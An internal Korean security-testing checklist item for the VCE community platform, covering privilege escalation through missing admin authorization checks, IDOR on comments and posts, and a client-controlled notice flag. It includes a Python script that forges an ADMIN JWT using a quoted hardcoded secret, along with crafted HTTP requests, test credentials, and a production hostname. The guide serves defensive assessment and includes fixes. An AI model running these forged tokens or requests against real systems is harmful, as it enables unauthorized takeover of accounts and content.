================================================================================
[VCE-CM-19] 일반 계정 권한 상승 가능성
도메인: community
위험도: Critical
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
일반 사용자 계정이 관리자(ADMIN) 전용 기능에 접근하거나, 권한 검증 없이
다른 사용자의 리소스를 조작할 수 있는지 확인한다.
VCE 커뮤니티 플랫폼에서 공지사항 등록, 게시글/댓글 강제 삭제, 관리자 전용
API 엔드포인트 접근 등의 권한 우회 시나리오를 점검한다.

JWT 기반 인증을 사용하는 시스템에서 서버 측 권한 검증이 미흡하거나,
JWT payload의 role 클레임을 신뢰하는 구조일 경우 위조된 토큰으로
권한 상승이 가능하다.

위험 시나리오:
  - 일반 사용자 JWT로 ADMIN 전용 API 직접 접근
  - JWT secret 노출을 이용한 ADMIN role 위조 토큰 생성
  - notice:true 파라미터 삽입으로 공지사항 강제 등록
  - 타 사용자 댓글을 권한 검증 없이 삭제 (IDOR)


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
기능                        메서드    엔드포인트
---------------------------------------------------------------------------
관리자 게시글 목록 조회      GET       /api/community/admin/posts
관리자 게시글 삭제           DELETE    /api/community/admin/posts/{id}
공지사항 등록 (ADMIN 전용)   POST      /api/community/posts  (isNotice=true)
댓글 삭제                   DELETE    /api/community/comments/{id}
사용자 목록 조회 (ADMIN)     GET       /api/admin/users
게시글 작성                 POST      /api/community/posts
게시글 수정                 PUT       /api/community/posts/{id}

테스트 계정:
  - 일반 사용자: test@vce.com / test1234
  - 관리자: admin@vce.com / admin1234

서버:
  - 로컬: http://localhost:8080
  - 운영: https://vceapp.com


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[원리 1] JWT Secret 하드코딩으로 인한 토큰 위조
  JwtTokenProvider.java:18에 JWT 서명 시크릿이 하드코딩되어 있다.
  공격자가 소스코드, 번들 파일, 에러 메시지 등을 통해 시크릿을 확보하면
  임의의 payload를 가진 JWT를 직접 서명하여 ADMIN role을 부여할 수 있다.

  정상 JWT payload 예시:
    {
      "sub": "test@vce.com",
      "role": "USER",
      "iat": 1700000000,
      "exp": 1700086400
    }

  위조 JWT payload:
    {
      "sub": "test@vce.com",
      "role": "ADMIN",
      "iat": 1700000000,
      "exp": 9999999999
    }

[원리 2] 서버 측 권한 검증 미흡 (IDOR)
  게시글/댓글 수정·삭제 API가 JWT의 sub(사용자 식별자)와
  리소스 소유자를 비교하지 않을 경우, 다른 사용자의 리소스를 조작 가능.

[원리 3] 클라이언트 파라미터 신뢰
  공지사항 등록 시 isNotice=true 파라미터를 서버가 사용자 역할 검증 없이
  처리할 경우, 일반 사용자가 공지사항 게시글을 등록 가능.


4. 테스트 절차 with HTTP Request Examples
--------------------------------------------------------------------------------

[테스트 4-1] 일반 사용자 JWT로 관리자 전용 API 직접 접근
--------------------------------------------------------------
Step 1: 일반 사용자 로그인하여 JWT 획득

POST /api/auth/login HTTP/1.1
Host: localhost:8080
Content-Type: application/json

{
  "email": "test@vce.com",
  "password": "test1234"
}

응답에서 accessToken 추출:
  {"accessToken": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0QHZjZS5jb20iLCJyb2xlIjoiVVNFUiIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjoxNzAwMDg2NDAwfQ.SIGNATURE"}

Step 2: 일반 JWT를 Authorization 헤더에 포함하여 관리자 API 접근

GET /api/community/admin/posts HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0QHZjZS5jb20iLCJyb2xlIjoiVVNFUiIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjoxNzAwMDg2NDAwfQ.SIGNATURE

기대 응답 (안전): HTTP 403 Forbidden
취약 응답 (위험): HTTP 200 OK (관리자 게시글 목록 반환)

Step 3: 관리자 전용 삭제 API 접근

DELETE /api/community/admin/posts/1 HTTP/1.1
Host: localhost:8080
Authorization: Bearer {일반사용자_JWT}

기대 응답 (안전): HTTP 403 Forbidden
취약 응답 (위험): HTTP 200 OK 또는 HTTP 204 No Content


[테스트 4-2] JWT Secret 획득 후 ADMIN role 위조 토큰 생성
--------------------------------------------------------------
Step 1: JwtTokenProvider.java 또는 설정 파일에서 시크릿 확인
  알려진 시크릿 위치: JwtTokenProvider.java:18
  예: private final String SECRET_KEY = "vce-secret-key-2024";

Step 2: jwt.io 또는 python-jwt를 사용하여 위조 토큰 생성

Python을 이용한 위조 토큰 생성 예시:
  import jwt
  import time

  secret = "vce-secret-key-2024"
  payload = {
      "sub": "test@vce.com",
      "role": "ADMIN",
      "iat": int(time.time()),
      "exp": int(time.time()) + 86400 * 365
  }
  forged_token = jwt.encode(payload, secret, algorithm="HS256")
  print(forged_token)

Step 3: 위조된 ADMIN JWT로 관리자 API 접근

GET /api/community/admin/posts HTTP/1.1
Host: localhost:8080
Authorization: Bearer {위조된_ADMIN_JWT}

DELETE /api/community/admin/posts/5 HTTP/1.1
Host: localhost:8080
Authorization: Bearer {위조된_ADMIN_JWT}

기대 응답 (안전): HTTP 401 Unauthorized (서명 검증 실패)
취약 응답 (위험): HTTP 200 OK


[테스트 4-3] notice:true 파라미터 삽입으로 공지사항 강제 등록
--------------------------------------------------------------
일반 사용자 JWT를 사용하여 공지사항 게시글 작성 시도.
isNotice 또는 notice 파라미터를 요청 바디에 삽입한다.

POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {일반사용자_JWT}

{
  "title": "긴급 공지사항 테스트",
  "content": "권한 우회 테스트용 공지",
  "categoryId": 1,
  "isNotice": true,
  "notice": true,
  "type": "NOTICE",
  "postType": "NOTICE"
}

파라미터 변형 시도:
  - "isNotice": true
  - "notice": true
  - "type": "NOTICE"
  - "category": "NOTICE"
  - "role": "ADMIN"

기대 응답 (안전): HTTP 403 Forbidden 또는 notice 필드 무시
취약 응답 (위험): 공지사항으로 게시글이 등록됨


[테스트 4-4] 댓글 삭제 IDOR - 타 사용자 댓글 조작
--------------------------------------------------------------
Step 1: admin 계정으로 댓글 작성하여 댓글 ID 확인

POST /api/community/comments HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {admin_JWT}

{
  "postId": 1,
  "content": "관리자 댓글 - 타겟"
}

응답: {"id": 42, "content": "관리자 댓글 - 타겟", ...}

Step 2: test 계정 JWT로 admin의 댓글(id=42) 삭제 시도

DELETE /api/community/comments/42 HTTP/1.1
Host: localhost:8080
Authorization: Bearer {test_JWT}

기대 응답 (안전): HTTP 403 Forbidden
취약 응답 (위험): HTTP 200 OK 또는 HTTP 204 No Content

Step 3: 타 사용자 댓글 수정 시도

PUT /api/community/comments/42 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {test_JWT}

{
  "content": "권한 없이 수정된 댓글"
}

기대 응답 (안전): HTTP 403 Forbidden
취약 응답 (위험): HTTP 200 OK


[테스트 4-5] 게시글 수정 IDOR
--------------------------------------------------------------
Step 1: admin 계정으로 게시글 작성하여 ID 확인
Step 2: test 계정 JWT로 admin 게시글 수정 시도

PUT /api/community/posts/10 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {test_JWT}

{
  "title": "수정된 제목 - 권한 우회",
  "content": "내용 무단 변조"
}

기대 응답 (안전): HTTP 403 Forbidden
취약 응답 (위험): HTTP 200 OK


[테스트 4-6] Burp Suite를 이용한 자동화 테스트
--------------------------------------------------------------
1. Burp Suite Proxy를 통해 관리자 로그인 후 정상 요청 캡처
2. Repeater 탭으로 요청 복사
3. Authorization 헤더의 JWT를 일반 사용자 JWT로 교체
4. Send 후 응답 코드 확인

Burp Suite Intruder 설정:
  - Attack type: Sniper
  - Payload position: Authorization 헤더의 JWT 값
  - Payload: 미리 생성한 위조 JWT 목록


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------
취약 (VULNERABLE):
  - 일반 사용자 JWT로 /api/community/admin/** 엔드포인트 접근 성공 (HTTP 200)
  - 위조된 ADMIN JWT가 서버에서 유효하게 처리됨
  - isNotice=true 파라미터로 공지사항 등록 성공
  - 타 사용자의 댓글/게시글을 소유자 검증 없이 삭제/수정 성공
  - HTTP 응답 코드: 200 OK, 204 No Content (권한 우회 성공)

안전 (SAFE):
  - 모든 관리자 전용 API에서 HTTP 403 Forbidden 반환
  - 위조 JWT 사용 시 HTTP 401 Unauthorized 반환
  - isNotice 파라미터 무시 또는 403 반환
  - 타 사용자 리소스 접근 시 HTTP 403 Forbidden 반환
  - 서버 측에서 JWT의 role 클레임뿐 아니라 DB 권한도 재검증


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------
파일: JwtTokenProvider.java:18
  - JWT 시크릿 하드코딩 → 위조 토큰 생성 가능
  예: private final String SECRET_KEY = "vce-secret-key-2024";

파일: CommunityController.java (예상)
  - 관리자 API에 @PreAuthorize("hasRole('ADMIN')") 어노테이션 미적용
  - 권한 체크를 클라이언트 측에서만 수행

파일: CommunityService.java (예상)
  - 댓글/게시글 삭제 시 소유자(userId) 비교 로직 누락
  예:
    // 취약한 코드
    commentRepository.deleteById(commentId);

    // 안전한 코드
    Comment comment = commentRepository.findById(commentId)
        .orElseThrow(() -> new EntityNotFoundException());
    if (!comment.getUser().getId().equals(currentUserId)) {
        throw new AccessDeniedException("삭제 권한이 없습니다.");
    }
    commentRepository.delete(comment);

파일: SecurityConfig.java (예상)
  - requestMatchers("/api/community/admin/**").hasRole("ADMIN") 미설정


7. 권고 조치
--------------------------------------------------------------------------------
[조치 1] JWT Secret 관리
  - 환경 변수 또는 AWS Secrets Manager, Vault 등 외부 시크릿 저장소 사용
  - 절대로 소스코드에 하드코딩 금지
  - 예: @Value("${jwt.secret}") private String jwtSecret;

[조치 2] 서버 측 권한 검증 강화
  - Spring Security의 @PreAuthorize 어노테이션 적용
    @PreAuthorize("hasRole('ADMIN')")
    @DeleteMapping("/admin/posts/{id}")
    public ResponseEntity<?> adminDeletePost(@PathVariable Long id) { ... }

  - Method Security 활성화:
    @EnableMethodSecurity(prePostEnabled = true)

[조치 3] IDOR 방지
  - 리소스 조작 전 반드시 소유자 검증
  - 현재 로그인 사용자 ID와 리소스 소유자 ID 비교
  - 서비스 계층에서 SecurityContextHolder를 통해 현재 사용자 확인

[조치 4] 공지사항 등록 권한 검증
  - isNotice=true 파라미터 처리 전 ADMIN 역할 검증
  - 일반 사용자 요청에서 isNotice 필드 무시 또는 400 Bad Request 반환

[조치 5] SecurityConfig 설정 검토
  .authorizeHttpRequests(auth -> auth
      .requestMatchers("/api/community/admin/**").hasRole("ADMIN")
      .requestMatchers("/api/admin/**").hasRole("ADMIN")
      .anyRequest().authenticated()
  )

================================================================================
작성일: 2024-01-01  |  진단 대상: VCE 커뮤니티 플랫폼  |  작성자: 보안진단팀
================================================================================
